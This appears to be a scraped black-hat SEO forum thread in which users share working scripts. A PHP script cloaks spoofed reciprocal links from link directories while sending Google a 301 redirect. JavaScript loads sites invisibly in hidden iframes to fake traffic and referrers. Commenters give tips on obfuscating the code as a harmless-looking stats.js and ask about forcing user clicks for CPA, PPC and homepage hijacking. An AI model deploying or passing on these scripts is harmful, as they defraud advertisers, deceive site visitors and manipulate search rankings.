SEO20's ultimate script-collection FREE

I will strongly consider it - since there is so much mis-information about the topic.

SEO20 - I don't mean to be redundant so please feel free to delete this post, but in your earlier unlimited traffic script thread you said you were going to post a way to take care of the referrer so it wouldn't show the iframe as the referrer or the page the iframe is on? Would you still be willing to make a post about that? I'm sure many of us would appreciate it greatly.
 
Any good PPC programs that the forced click works well with?
 
I guess this thread was a bit too long for people to gasp it.
 
you've outdone yourself with these scripts seo20. excellent stuff.
 
Great stuff seo20.

The invisible loader is simple but very powerful. Ive been using it with brads cparedirector to securely hide the referer, although I guess the unlimited traffic script would do the same. If you have access to any uber traffic sites then you can easily get a lot of people to "visit" your site (or chosen page) while being sure that the referrer is set as your site.

If you need to hide the script a little within the code of the page your planting it on then host it externally and obfuscate the code by searching google for html encryption or something. Name it something like stats.js and nobody will be suspicious if they checked the source. You could even use htaccess to display something else if someone tried to view the script directly but thats a little more complex... You just have to watch the page your invisibly loading isnt too large as it will appear in the browser bar too long.
 
I'm sorry, but this is really getting to me. I'm so damn curious about this-

What's the difference between the unlimited traffic script and the hidden window script? How do they differentiate from each other? I honestly can't figure out the difference between the two scripts. I'd really appreciate an explanation about how they differentiate.
 
Thank you very much for your post. I enjoyed your previous one too. Forgive my ignoranc, but I'm wondering if anyone has tried to use the unlimited traffic script to create a daisy chain with a bunch of other sites? If I keep the pop-unders on the other site, will they still have the same effect on the main site, that is slowing it down and hindering performance? I have a couple white hat sites with a million uniques a month that this could be killer when used in conjunction. Appreciate your thoughts.
 
Does the script work for PPV? So i can basically call 50 website with ppv on them from just one visit?

On the force clicking script:
If I create a search engine site with my adsense on and I want to have it set the users hompage automatically, how would I use the forced click to do that? I played around with it, with no success. I would make them click a link that look like something else, and then then use the forced click to click the "set home page confirmetion" button.

I can get it to where it clicks "set home page" bt then a little promt pops up asking to confirm.

Sorry for all the questions, and I hope you can help with this.
Thanks
 
Last edited:
Nothing new to me except for the forced click, now that's interesting stuff. Unfortunately JS security kicks in to prevent clicks on links - but there's a rather sneaky not-so-clever way of getting around it.

Also to ppl scratching their heads about the ultimate traffic script - the title is a little off. Basically it's a funnel, you direct traffic to a site - and then the javascript creates hidden iframes to the pages. You still need to generate that initial traffic - it's not going to generate it for you out of nothing but some js code ..lol
 
:)Script train:)
Link directory PR tunnel


Spoof the reciprocal link code given by link directories.
When the directory checks your page it will see there code annex reciprocal link.
When google checks it, it will get a 301 permanent redirect.
Flowing all pagerank to any location you might like.

First you need identify the directory.
Code:
<?php 
$i = file ("[COLOR="red"]urllist.txt[/COLOR]");
foreach ($i as $q){
	echo gethostbyname(trim($q)).'<br>';
}?>
You get the urls from the directories and save them as urllist.txt.
One per line. Run the script above.
It will give all the ip's, with which you can identify directories when they check for the reciprocal link.
Copy/paste the ips it puts out to your notepad and save as ip.gif. (don't forget the .gif extension)
Now get the reciprocal link code from the directories and save them as code.gif. (don't forget the .gif extension)
Upload the script below and with ip.gif and code.gif.

Change the location, which is now google in red, to whatever location you want the pr to flow to.
You can get a large list of directories here;
Code:
http://www.blackhatworld.com/blackhat-seo/white-hat-seo/182556-get-largest-list-directories-24000-directories.html

Code:
<?php
 $allow = file('[COLOR="Red"]ip.gif[/COLOR]');

if(!in_array($_SERVER['REMOTE_ADDR'], $allow) && !in_array($_SERVER["HTTP_X_FORWARDED_FOR"], $allow)) {

	$location = "[COLOR="Red"]http://www.google.com[/COLOR]";

	 header ('HTTP/1.1 301 Moved Permanently');
  header ('Location: '.$location);
	exit();

} else {
echo file_get_contents ("[COLOR="red"]code.gif[/COLOR]");
}

?>

Its not working with me.. :eek: i tried it twice.. can you give me an example of link directory working with this script??
 
Get unlimited traffic

This is the collection of urls you want to load silently. Add as many as you want.

Code:
var aDomains = [".com"];
This is the referrer check. IF you only want the script to work when people are comming from google. Write
"google.com" in there. You can comma delimit the list if you want.

example:

Code:
Code:
var aDomains = ["google.com","yahoo.com"];
I didnt understand that part.
Did you meant that if I include google.com,yahoo.com,myurl.com etc it loads all those URLS together or something else.Can you explain this part?Thanks
 
That's right - I'M back.

Code:
var aDomains = [".com"];
This is the referrer check. IF you only want the script to work when people are comming from google. Write
"google.com" in there. You can comma delimit the list if you want.

example:

Code:
Code:
var aDomains = ["google.com","yahoo.com"];
So here is the main script you simple insert on your HTML-page and the magic happens.
It's still a good idea to take care of the referrer on your pages.

HTML:
<script type="text/javascript">
    var sLocation = document.referrer.toLocaleLowerCase();
    //Links to boost
    var rDomains = ["http://www.google.com","http://www.apple.com"];
    //Allowed domain referrer
    var aDomains = [".com"];
    var valid = 0;

    //Valid referrer
    for (i=0;i<aDomains.length;i++) {
        //Check referrer
        if (sLocation.indexOf(aDomains[i], 0) > -1) 
        {
            valid = 1;
            break;
        }
    }

    //Valid referrer
    if (valid == 1) 
    {
        //Loop
        for (i=0;i<rDomains.length;i++) {
            //alert(rDomains[i]);
            invisibleWindow("mydiv" + i,rDomains[i]);
        }
    }

    function invisibleWindow(iframeID, url) {
        divel = document.createElement("div");
        divel.id = "div" + iframeID;
        divel.style.width = "5px"; 
        divel.style.height = "5px";
        divel.style.visibility = "hidden";

        //Add div
        document.body.appendChild(divel);

        domiframe = document.createElement("iframe");
        domiframe.id = iframeID; 
        domiframe.src = url;
        domiframe.style.width = "5px"; 
        domiframe.style.height = "5px";
        domiframe.style.visibility = "hidden";

        var divid = document.getElementById("div" + iframeID);
        divid.appendChild(domiframe);
    }

</script>


I want to make sure I am getting this right
which one is supposed to be the referrer and which is the one that the hits load up on?

Thank you so much
 
Thank you! I was waiting for answers for a couple of days now.. I tried the script, but when it the directory site validates the IP logger script it successfully validates the reciprocal link without the fake spoofer script. I dunno what's going on with this, have you tested it?
 
Last edited:
really excellent share. Just subscribing to the thread.
 
Will be watching this bad boy! Glad that your up in the staff Seo20 always contributing solid shit!
 
Does the autoclickscript works with C.P.A.lead? anyone tried it?
 
Back
Top